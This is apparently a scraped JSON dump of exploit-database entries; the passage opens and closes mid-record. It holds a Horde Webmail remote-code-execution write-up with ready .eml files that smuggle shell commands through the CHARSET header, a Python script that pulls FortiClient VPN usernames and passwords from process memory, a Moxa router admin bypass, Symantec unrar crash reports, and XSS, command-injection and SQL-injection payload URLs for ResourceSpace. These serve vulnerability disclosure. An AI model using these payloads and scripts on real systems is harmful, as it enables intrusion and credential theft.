=\r\n$GLOBALS['injector']->getInstance('Horde_Crypt_Pgp_Parse')->parseToPart(\r\n/* 242 */ new Horde_Stream_Existing(array(\r\n/* 243 */ 'stream' => $this->_mimepart->getContents(array('stream' => true))\r\n/* 244 */ )),\r\n/* 245 */ $this->_mimepart->getCharset()\r\n/* 246 */ );\r\n \r\nOur charset value is taken from CHARSET attribute of Content-Type\r\nheader of parent MIMEpart.\r\n \r\n_parsePGP() is used in _getEmbeddedMimeParts() method and from Horde\r\nWebmail ver 5.2.0 it looks like:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 222 */ protected function _getEmbeddedMimeParts()\r\n/* 223 */ {\r\n/* 224 */ $ret = $this->getConfigParam('pgp_inline')\r\n/* 225 */ ? $this->_parsePGP()\r\n/* 226 */ : null;\r\n \r\nWe can see an additional requirement \u2013 our function will be called\r\nonly if \u2018pgp_inline\u2018 config parameter is \u201ctrue\u201d. It is defined in:\r\n \r\nPath \u2013 /imp/config/mime_drivers.php\r\n \r\n/* 37 */ /* Scans the text for inline PGP data. If true, will strip this data\r\n/* 38 */ * out of the output (and, if PGP is active, will display the\r\n/* 39 */ * results of the PGP action). */\r\n/* 40 */ 'pgp_inline' => false\r\n \r\nDefault value is false, so the major part of Horde servers is not\r\nvulnerable and our attack is relevant only if an admin manually has\r\nchanged this line to \u2018pgp_inline\u2018 => true.\r\n \r\nBut in older versions (before 5.2.0) the code of\r\n_getEmbeddedMimeParts() is a bit different:\r\n \r\nPath \u2013 /imp/lib/Mime/Viewer/Plain.php\r\n \r\n/* 227 */ protected function _getEmbeddedMimeParts()\r\n/* 228 */ {\r\n/* 229 */ $ret = null;\r\n/* 230 */\r\n/* 231 */ if (!empty($GLOBALS['conf']['gnupg']['path']) &&\r\n/* 232 */ $GLOBALS['prefs']->getValue('pgp_scan_body')) {\r\n/* 233 */ $ret = $this->_parsePGP();\r\n/* 234 */ }\r\n \r\nSo instead of requirement to have config parameter we have requirement\r\nof \u2018pgp_scan_body\u2018 Preference of current user. And it is more likely\r\nto find a victim with needed preferences. We saw where our injected\r\ncommand is executed and from where and when it is taken\r\n \r\nDuring rendering of massage we:\r\n \r\nWill parse PGP values:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#1 IMP_Mime_Viewer_Plain->_getEmbeddedMimeParts() called at\r\n[/Horde/Mime/Viewer/Base.php:298]\r\n#2 Horde_Mime_Viewer_Base->getEmbeddedMimeParts() called at\r\n[/imp/lib/Contents.php:1114]\r\n#3 IMP_Contents->_buildMessage() called at [/imp/lib/Contents.php:1186]\r\n#4 IMP_Contents->getContentTypeMap() called at [/imp/lib/Contents.php:1423]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]\r\n \r\nWill use them in:\r\n \r\n#0 IMP_Mime_Viewer_Plain->_parsePGP() called at\r\n[/imp/lib/Mime/Viewer/Plain.php:225]\r\n#0 IMP_Mime_Viewer_Pgp->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#1 Horde_Mime_Viewer_Base->render() called at [/Horde/Mime/Viewer/Base.php:207]\r\n#2 Horde_Mime_Viewer_Base->_renderInline() called at\r\n[/Horde/Mime/Viewer/Base.php:156]\r\n#3 Horde_Mime_Viewer_Base->render() called at [/imp/lib/Contents.php:654]\r\n#4 IMP_Contents->renderMIMEPart() called at [/imp/lib/Contents.php:1462]\r\n#5 IMP_Contents->getInlineOutput() called at\r\n[/imp/lib/Ajax/Application/ShowMessage.php:296]]\r\n \r\nIn conclusions:\r\n \r\nIf Horde server has vulnerable configuration:\r\n \r\nEnabled \u201cGnuPG feature\u201d (there is path to gpg binary in\r\n$conf[gnupg][path] setting)\r\nOnly for ver 5.2.0 and newer: \u2018pgp_inline\u2019 => true, in\r\n/imp/config/mime_drivers.php\r\n \r\nAnd the victim has checked the next checkbox in his/her preferences (\r\n\u201cPGP Configure PGP encryption support.\u201d in Prefferences->Mail) :\r\n \r\n\u201cEnable PGP functionality\u201d\r\n\u201cShould PGP signed messages be automatically verified when viewed?\u201d if\r\nit is not checked our command will be executed when the victim clicks\r\non the link \u201cClick HERE to verify the message.\u201d\r\nFor versions before 5.2.0: \u201cShould the body of plaintext message be\r\nscanned for PGP data\u201d\r\n \r\nAn attacker can create email with PGP data, put desired command into\r\nCHARSET attribute of ContentType header, and this command will be\r\nexecuted on Horde server when the victim opens this email.\r\n \r\nProof of Concept \u2013 Remote Code Execution\r\n \r\nFor Proof of Concept we can use preconfigured image of Horde server\r\nfrom Bitnami (Bitnami \u2013 \u201cEasy to use cloud images, containers, and VMs\r\nthat work on any platform\u201d):\r\n \r\nhttps://downloads.bitnami.com/files/stacks/horde/5.2.17-0/bitnami-horde-5.2.17-0-linux-ubuntu-14.04-x86_64.ova\r\n \r\nStep 1 \u2013 Login as admin (by default user:bitnami) and go to\r\nAdministration -> Configuration and choose Horde (horde). Open GnuPG\r\ntab, enter /usr/bin/gpg into $conf[gnupg][path] setting and click\r\n\u201cGenerate Horde Configuration\u201c:\r\n \r\nNow we have enabled GPG feature on our server and we can login as\r\nregular user and try to execute desired commands. But Bitnami image\r\ndoes not have installed and configured Mail server so we need to use\r\nexternal one or install it on local machine.\r\n \r\nWe will use gmail account (to be able to login to it from Horde I had\r\nto change Gmail account setting Allow less secure apps: ON).\r\n \r\nTo use external Mail server we need to change the next setting:\r\n\u201cAdministrator Panel\u201d -> \u201cConfiguration\u201d -> \u201cHorde\u201d ->\r\n\u201cAuthentication\u201d\r\n \r\nConfigure the application authentication ($conf[auth][driver]) \u2013\r\nchange this option to \u201cLet a Horde application handle authentication\u201d\r\nand click \u201cGenerate Horde Configuration\u201d.\r\n \r\nIf we have Horde Webmail ver 5.2.0 or newer we need to edit\r\n/imp/config/mime_drivers.php file. Login to the console of bitnami\r\nimage (default bitnami:bitnami) and run the next command:\r\n \r\nsudo nano /opt/bitnami/apps/horde/htdocs/imp/config/mime_drivers.php\r\n \r\nChange the line: \u201c\u2018pgp_inline\u2019 => false\u201d to \u201c\u2018pgp_inline\u2019 => true\u201d and\r\nsave the changes.\r\n \r\nStep 2 \u2013 Logout and login with your gmail account.\r\n \r\nStep 3 \u2013 Go to Preferences -> Mail and click on PGP link:\r\n \r\nCheck Enable PGP functionality checkbox and click \u201cSave\u201d\r\nCheck Should PGP signed messages be automatically verified when viewed checkbox\r\nFor versions before 5.2.0 check \u201cShould the body of plain-text message\r\nbe scanned for PGP data\u201d checkbox Click \u201cSave\u201d\r\n \r\nFor version before 5.2.0:\r\n \r\nStep 4 \u2013 Go to the Mail, take any mail folder (for example Drafts),\r\nand chose \u201cImport\u201d item from context menu and import attack_whoami.eml\r\nfile (in the end of this blog).\r\n \r\nClick on the imported email:\r\n \r\nOur Horde serve is launched under daemon user\r\n \r\nStep 5 \u2013 We can do the same with attack_touch.eml (in the end of this\r\nblog) file (import it and click on the new mail) and check /tmp\r\nfolder:\r\n \r\nattack_touch.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_touch_tmp_youarevuln\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=\"US-ASCII`touch /tmp/youarevuln`\";\r\nformat=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQF4aAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSQUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\r\n \r\nattack_whoami.eml\r\n \r\nDate: Fri, 04 Nov 2016 16:04:19 +0000\r\nMessage-ID: <[email\u00a0protected]>\r\nFrom: Donald Trump <[email\u00a0protected]>\r\nTo: [email\u00a0protected]\r\nSubject: PGP_INLine_whoami\r\nX-IMP-Draft: Yes\r\nContent-Type: text/plain; CHARSET=US-ASCII`whoami`; format=flowed; DelSp=Yes\r\nMIME-Version: 1.0\r\nContent-Disposition: inline\r\n \r\n \r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\nThis is a sample of a clear signed message.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: 2.6.2\r\n \r\niQCVAwUBMoSCcM4T3nOFCCzVAQFJaAP/eaP2nssHHDTHyPBSjgwyzryguwBd2szF\r\nU5IFy5JfU+PAa6NV6m/UWW8IKczNX2cmaKQNgubwl3w0odFQPUS+nZ9myo5QtRZh\r\nDztuhjzJMEzwtm8KTKBnF/LJ9X05pSsUvoHfLZ/waJdVt4E/xfEs90l8DT1HDdIz\r\nCvynscaD+wA=\r\n=Xb9n\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27576"}, {"lastseen": "2018-02-02T03:14:38", "references": [], "description": "Industrial Secure Routers versions EDR-G903, EDR-G902, and EDR-G903 allow for unauthenticated administrative access.", "edition": 1, "reporter": "Nassim Asrir", "published": "2016-10-25T00:00:00", "title": "Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 Access Bypass Vulnerabilities", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-10-25T00:00:00", "href": "https://0day.today/exploit/description/26083", "id": "1337DAY-ID-26083", "sourceData": "Title: Industrial Secure Routers - Insecure Configuration Management\r\nType: Local/Remote\r\nAuthor: Nassim Asrir\r\nAuthor Company: HenceForth\r\nImpact: Insecure Configuration Management\r\nRisk: (4/5)\r\nRelease Date: 22.10.2016\r\n\r\nSummary:\r\nMoxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.\r\nThe EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically \r\ndesigned for automation networks,which protects the integrity of remote access and critical devices.\r\n\r\ndescription:\r\n\r\nUsing this Vulnerability we can change the Admin configuration without knowing Password & Username\r\n\r\nBecause the form for change the configurations is Insecure.\r\n\r\nVendor:\r\nhttp://www.moxa.com/product/Industrial_Secure_Routers.htm\r\n\r\nAffected Version:\r\nEDR-810, EDR-G902 and EDR-G903\r\n\r\nTested On:\r\nLinux // Dist (Bugtraq 2)\r\n\r\nVendor Status:\r\nI told them and i wait for the answer.\r\n\r\nPoC:\r\n- when you navigate the server automatically you redirect to the login page (http://site/login.asp).\r\n\r\n- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.\r\n\r\nCredits\r\nVulnerability discovered by Nassim Asrir - <[email\u00a0protected]>\n\n# 0day.today [2018-02-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26083"}, {"lastseen": "2017-12-31T21:13:00", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "Google Security Research", "published": "2016-09-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5309", "CVE-2016-5310"], "modified": "2016-09-21T00:00:00", "id": "1337DAY-ID-24816", "href": "https://0day.today/exploit/description/24816", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=867\r\n \r\nIn issue 810 we pointed out to Symantec that they hadn't updated their unrar based unpacker for years, and it was vulnerable to dozens of publicly documented flaws.\r\n \r\nI had expected Symantec to rebase on 5.4.2 (the latest version as of this writing), but they appear to have just backported fixes for the few issues I sent them.\r\n \r\nHere are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh.\r\n \r\nAs in issue 810, these are remote code execution vulnerabilities at the highest possible privilege level.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40405.zip\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24816"}, {"lastseen": "2018-03-13T20:39:01", "references": [], "description": "Exploit for windows platform in category local exploits", "edition": 2, "reporter": "Viktor Minin", "published": "2016-09-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "FortiClient SSLVPN 5.4 - Credentials Disclosure", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-09-01T00:00:00", "id": "1337DAY-ID-24777", "href": "https://0day.today/exploit/description/24777", "sourceData": "'''\r\nTitle : Extracting clear text passwords from running processes(FortiClient)\r\nCVE-ID : none\r\nProduct : FortiClient SSLVPN\r\nService : FortiTray.exe\r\nAffected : <=5.4\r\nImpact : Critical\r\nRemote : No\r\nWebsite link : http://forticlient.com/\r\nReported : 31/08/2016\r\nAuthors : Viktor Minin https://1-33-7.com\r\n Alexander Korznikov http://korznikov.com\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\nIn our research which involved this program we found that this process store the credentials that you supplied for connecting, in clear text in the process memory.\r\nIn this situation a potential attacker who hacked your system can reveal your Username and Password steal and use them.\r\nThis may assist him in gaining persistence access to your Organization LAN network.\r\n'''\r\n \r\nfrom winappdbg import Debug, Process, HexDump\r\nimport sys\r\n \r\nfilename = \"FortiTray.exe\" # Process name\r\nsearch_string = \"fortissl\" # pattern to get offset when the credentials stored\r\n \r\n# Searching function\r\ndef memory_search( pid, strings ):\r\n process = Process( pid )\r\n mem_dump = []\r\n ######\r\n # You could also use process.search_regexp to use regular expressions,\r\n # or process.search_text for Unicode strings,\r\n # or process.search_hexa for raw bytes represented in hex.\r\n ######\r\n for address in process.search_bytes( strings ):\r\n dump = process.read(address-10,800) #Dump 810 bytes from process memory\r\n mem_dump.append(dump)\r\n for i in mem_dump:\r\n if \"FortiClient SSLVPN offline\" in i: #print all founds results by offsets to the screen.\r\n print \"\\n\"\r\n print \" [+] Address and port to connect: \" + str(i[136:180])\r\n print \" [+] UserName: \" + str(i[677:685])\r\n print \" [+] Password: \" + str(i[705:715])\r\n print \"\\n\"\r\n \r\ndebug = Debug()\r\ntry:\r\n # Lookup the currently running processes.\r\n debug.system.scan_processes()\r\n # Look for all processes that match the requested filename...\r\n for ( process, name ) in debug.system.find_processes_by_filename( filename ):\r\n pid = process.get_pid()\r\n memory_search(pid,search_string)\r\nfinally:\r\n debug.stop()\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24777"}, {"lastseen": "2018-02-06T01:26:15", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2016-06-29T00:00:00", "type": "zdt", "title": "Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2207"], "modified": "2016-06-29T00:00:00", "href": "https://0day.today/exploit/description/26072", "id": "1337DAY-ID-26072", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810\r\n \r\nA major component of the Symantec Antivirus scan engine is the \"Decomposer\", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).\r\n \r\nBy comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.\r\n \r\nBetween the version of unrar that Symantec runs as NT AUTHORITY\\SYSTEM to unpack untrusted binaries received over the network and the the current version, literally hundreds of critical memory corruption bugs have been resolved.\r\n \r\nI have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORTITY\\SYSTEM on Windows and root on Linux and Mac.\r\n \r\nI have verified this on the following products:\r\n \r\n Norton Antivirus, Windows\r\n Symantec Endpoint Protection, Linux and Windows\r\n Symantec Scan Engine, Linux and Windows\r\n \r\nPresumably this affects all other Symantec products using the core Symantec scan engine.\r\n \r\nIn my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.\r\n \r\nI've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ(). \r\n \r\n \r\n(534.adc): Access violation - code c0000005 (!!! second chance !!!)\r\neax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217\r\neip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0 nv up ei ng nz na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286\r\nccScanw!filelengthi64+0x470b6:\r\n6d7b4016 8994be005d0000 mov dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00\r\n0:052> lm v mccScanw\r\nstart end module name\r\n6d690000 6d8bf000 ccScanw (export symbols) C:\\Program Files (x86)\\Norton Security\\Engine\\22.6.0.142\\ccScanw.dll\r\n Loaded symbol image file: C:\\Program Files (x86)\\Norton Security\\Engine\\22.6.0.142\\ccScanw.dll\r\n Image path: C:\\Program Files (x86)\\Norton Security\\Engine\\22.6.0.142\\ccScanw.dll\r\n Image name: ccScanw.dll\r\n Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)\r\n CheckSum: 0022B3ED\r\n ImageSize: 0022F000\r\n File version: 13.1.2.19\r\n Product version: 13.1.2.19\r\n File flags: 0 (Mask 3F)\r\n File OS: 40004 NT Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Symantec Corporation\r\n ProductName: Symantec Security Technologies\r\n InternalName: ccScan\r\n OriginalFilename: CCSCAN.DLL\r\n ProductVersion: 13.1.2.19\r\n FileVersion: 13.1.2.19\r\n FileDescription: Symantec Scan Engine\r\n LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.\r\n \r\nThese bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40031.zip\n\n# 0day.today [2018-02-05] #", "sourceHref": "https://0day.today/exploit/26072", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T04:24:57", "references": [], "edition": 2, "description": "Exploit for windows platform in category local exploits", "reporter": "LiquidWorm", "published": "2016-06-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escala", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-06-20T00:00:00", "id": "1337DAY-ID-25601", "href": "https://0day.today/exploit/description/25601", "sourceData": "ACROS Security 0patch (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation\r\n \r\n \r\nVendor: ACROS, d.o.o.\r\nProduct web page: https://www.0patch.com\r\nAffected version: 2016.05.19.539\r\n \r\nSummary: 0patch (pronounced 'zero patch') is a platform for instantly\r\ndistributing, applying and removing microscopic binary patches to/from\r\nrunning processes without having to restart these processes (much less\r\nreboot the entire computer).\r\n \r\nDesc: The application suffers from an unquoted search path issue impacting\r\nthe service '0patchservice' for Windows deployed as part of 0patch solution.\r\nThis could potentially allow an authorized but non-privileged local user to\r\nexecute arbitrary code with elevated privileges on the system. A successful\r\nattempt would require the local user to be able to insert their code in the\r\nsystem root path undetected by the OS or other security applications where\r\nit could potentially be executed during application startup or reboot. If\r\nsuccessful, the local user\u2019s code would execute with the elevated privileges\r\nof the application.\r\n \r\nTested on: Microsoft Windows 7 Ultimate SP1 (EN)\r\n Microsoft Windows 7 Professional SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5331\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5331.php\r\n \r\nVendor: https://0patch.blogspot.com/2016/06/new-release-0patch-agent-20160614850.html\r\n \r\n \r\n08.06.2016\r\n \r\n--\r\n \r\n \r\nC:\\>sc qc 0patchservice\r\n[SC] QueryServiceConfig SUCCESS\r\n \r\nSERVICE_NAME: 0patchservice\r\n TYPE : 10 WIN32_OWN_PROCESS\r\n START_TYPE : 2 AUTO_START\r\n ERROR_CONTROL : 1 NORMAL\r\n BINARY_PATH_NAME : C:\\Program Files (x86)\\0patch\\Agent\\0PatchServicex64.exe\r\n LOAD_ORDER_GROUP :\r\n TAG : 0\r\n DISPLAY_NAME : 0patch Service\r\n DEPENDENCIES :\r\n SERVICE_START_NAME : LocalSystem\r\n \r\nC:\\>cacls \"C:\\Program Files (x86)\\0patch\\Agent\\0PatchServicex64.exe\"\r\nC:\\Program Files (x86)\\0patch\\Agent\\0patchServicex64.exe NT AUTHORITY\\SYSTEM:(ID)F\r\n BUILTIN\\Administrators:(ID)F\r\n BUILTIN\\Users:(ID)R\r\n \r\n \r\nC:\\>\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25601"}, {"lastseen": "2018-04-08T22:53:40", "references": [], "description": "Exploit for php platform in category web applications", "edition": 2, "reporter": "Adler Freiheit", "published": "2014-12-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling", "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-12-18T00:00:00", "id": "1337DAY-ID-23013", "href": "https://0day.today/exploit/description/23013", "sourceData": "Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL\r\nInjection Vulnerabilities\r\n \r\nAuthor: Adler Freiheit\r\nDiscovered: 11 June 2014\r\nUpdated: 11 December 2014\r\nPublished: 11 December 2014\r\nVendor: Montala Limited\r\nVendor url: www.resourcespace.org\r\nSoftware: ResourceSpace Digital Asset Management Software\r\nVersions: 6.4.5976 and prior\r\nStatus: Unpatched\r\nVulnerable scripts:\r\n/pages/themes.php\r\n/pages/preview.php\r\n/pages/help.php\r\n/pages/search.php\r\n/pages/user_password.php\r\n/pages/user_request.php\r\n(and probably others)\r\n \r\nDescription:\r\nResourceSpace is vulnerable to Cross-Site Scripting, and HTML and SQL\r\ninjection attacks, and insecure cookie handling. The scripts fail to\r\nproperly sanitize user-supplied input, check the network protocol used\r\nto access the site.\r\n \r\nVulnerability: SC\u00ad1414\r\nName: Cross Site Scripting (XSS)\r\nType: Application\r\nAsset Group: Multiple\r\nSource: SureCloud\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 6 Oct 2014\r\nService: tcp/https:443\r\nSeverity: 4\r\nRisk: 40\r\nCVSS Base Score: 5.8 ( Exploit: 8.6 Impact: 4.9 )\r\nResolution Effort: 3\r\n \r\nDescription:\r\n This web application is vulnerable to Cross Site Scripting (XSS).\r\nXSS is caused when an application echoes user controllable input data\r\nback to the browser without first sanitising or escaping dangerous\r\ncharacters. Unescaped strings are then interpreted or executed by the\r\nbrowser as script, just as if they had originated from the web server.\r\nMalicious script is sent by the attacker via the vulnerable web\r\napplication and executed on the victims browser, within the context of\r\nthat user and may be used to steal session information, redirect users\r\nto a malicious site, and even steal credentials in a Phishing attack.\r\nRef: http://www.owasp.org/index.php/Cross_Site_Scripting\r\nhttp://cwe.mitre.org/data/definitions/79.html\r\n \r\nSolution:\r\n Validate all user controllable input data (hidden fields, URL\r\nparameters, Cookie values, HTTP headers etc) against expected Type,\r\nLength and where possible, Format and Range characteristics. Reject\r\nany data that fails validation.\r\nSanitise all user controllable input data (hidden fields, URL\r\nparameters, Cookie values, HTTP headers etc) by converting potentially\r\ndangerous characters (listed below) into HTML entities such as > < etc\r\nusing output encoding.\r\nBy combining proper input validation with effective input sanitisation\r\nand output encoding, Cross Site Scripting vulnerabilities will be\r\nmitigated.\r\n[1] <> (triangular parenthesis)\r\n[2] \" (quotation mark)\r\n[3] ' (single apostrophe)\r\n[4] % (percent sign)\r\n[5] ; (semicolon)\r\n[6] () (parenthesis)\r\n[7] & (ampersand sign)\r\n[8] + (plus sign)\r\n[9] / (forward slash)\r\n[10] | (pipe)\r\n[11] [] (square brackets)\r\n[12] : (colon)\r\n \r\nInformation\r\nURI: /pages/preview.php\r\nParameter: sort (GET)\r\nOther Info: \"><SCRIPT>alert('SureApp XSS');</SCRIPT>\r\n \r\nVulnerability: 44967\r\nName: CGI Generic Command Execution (time\u00adbased)\r\nType: CGI abuses\r\nAsset Group: Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address\r\nStatus: Open\r\nHostname:\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 4\r\nRisk: 40\r\nCVSS Base Score: 7.5\r\n \r\nDescription:\r\n The remote web server hosts CGI scripts that fail to adequately\r\nsanitize request strings. By leveraging this issue, an attacker may be\r\nable to execute arbitrary commands on the remote host.\r\nNote that this script uses a time\u00adbased detection method which is less\r\nreliable than the basic method.\r\n \r\nSolution:\r\n Restrict access to the vulnerable application. Contact the\r\nvendor for a patch or upgrade.\r\n \r\nInformation:\r\n Using the GET HTTP method, Nessus found that:\r\n \r\n+ The following resources may be vulnerable to arbitrary command\r\nexecution (time based) :\r\n+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :\r\n \r\n/pages/themes.php?lastlevelchange=%20;%20x%20%7C%7C%20sleep%203%20%26\r\n/pages/themes.php?lastlevelchange=%7C%7C%20sleep%203%20%26\r\n/pages/themes.php?lastlevelchange=%26%20ping%20\u00adn%203%20127.0.0.1%20%26\r\n/pages/themes.php?lastlevelchange=x%20%7C%7C%20ping%20\u00adn%203%20127.0.0.1%20%26\r\n/pages/themes.php?lastlevelchange=%7C%7C%20ping%20\u00adn%203%20127.0.0.1%20%26\r\n/pages/themes.php?lastlevelchange=%7C%20ping%20\u00adn%203%20127.0.0.1%20%7C\r\n \r\nReferences:\r\nCWE: 20\r\nCWE: 713\r\nCWE: 722\r\nCWE: 727\r\nCWE: 74\r\nCWE: 77\r\nCWE: 78\r\n \r\n\u2013-----------------------------------------------------------------------------------------------------\r\nVulnerability: 43160\r\nName: CGI Generic SQL Injection (blind, time based)\r\nType: CGI abuses\r\nAsset Group: Multiple\r\nSource: SureCloud Vulnerability Scan\r\nIP Address:\r\nStatus: Open\r\nHostname:\r\nLast Seen: 11 Nov 2014\r\nService: tcp/www:443\r\nSeverity: 4\r\nRisk: 40\r\nCVSS Base Score: 7.5\r\n \r\nDescription\r\n By sending specially crafted parameters to one or more CGI scripts\r\nhosted on the remote web server, Nessus was able to get a slower\r\nresponse, which suggests that it may have been able to modify the\r\nbehavior of the application and directly access the underlying\r\ndatabase.\r\nAn attacker may be able to exploit this issue to bypass\r\nauthentication, read confidential data, modify the remote database, or\r\neven take control of the remote operating system.\r\nNote that this script is experimental and may be prone to false positives.\r\n \r\nSolution:\r\n Modify the affected CGI scripts so that they properly escape arguments.\r\n \r\nInformation:\r\n Using the GET HTTP method, Nessus found that :\r\n+ The following resources may be vulnerable to blind SQL injection\r\n(time based) :\r\n+ The 'lastlevelchange' parameter of the /pages/themes.php CGI :\r\n/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='\r\n/pages/themes.php?lastlevelchange='%20AND%200%20IN%20(SELECT%20SLEEP(3))%20\u00ad\u00ad%20\r\n/pages/themes.php?lastlevelchange=';WAITFOR%20DELAY%20'00:00:3';\r\n/pages/themes.php?lastlevelchange=');WAITFOR%20DELAY%20'00:00:3';\r\n/pages/themes.php?lastlevelchange='));WAITFOR%20DELAY%20'00:00:3';\r\n/pages/themes.php?lastlevelchange=';SELECT%20pg_sleep(3);\r\n/pages/themes.php?lastlevelchange=');SELECT%20pg_sleep(3);\r\n/pages/themes.php?lastlevelchange='));SELECT%20pg_sleep(3);\r\n \r\nClicking directly on these URLs should exhibit the issue :\r\n(you will probably need to read the HTML source)\r\n/pages/themes.php?lastlevelchange='%20AND%20SLEEP(3)='\r\n \r\nReferences\r\nCWE: 20\r\nCWE: 713\r\nCWE: 722\r\nCWE: 727\r\nCWE: 751\r\nCWE: 77\r\nCWE: 801\r\nCWE: 810\r\nCWE: 89\r\n \r\n\u2013---------------------------------------------------------------------------------------------------------------\r\n \r\nVulnerability: 55903\r\nName: CGI Generic XSS (extended patterns)\r\nType: CGI abuses : XSS\r\nAsset Group: 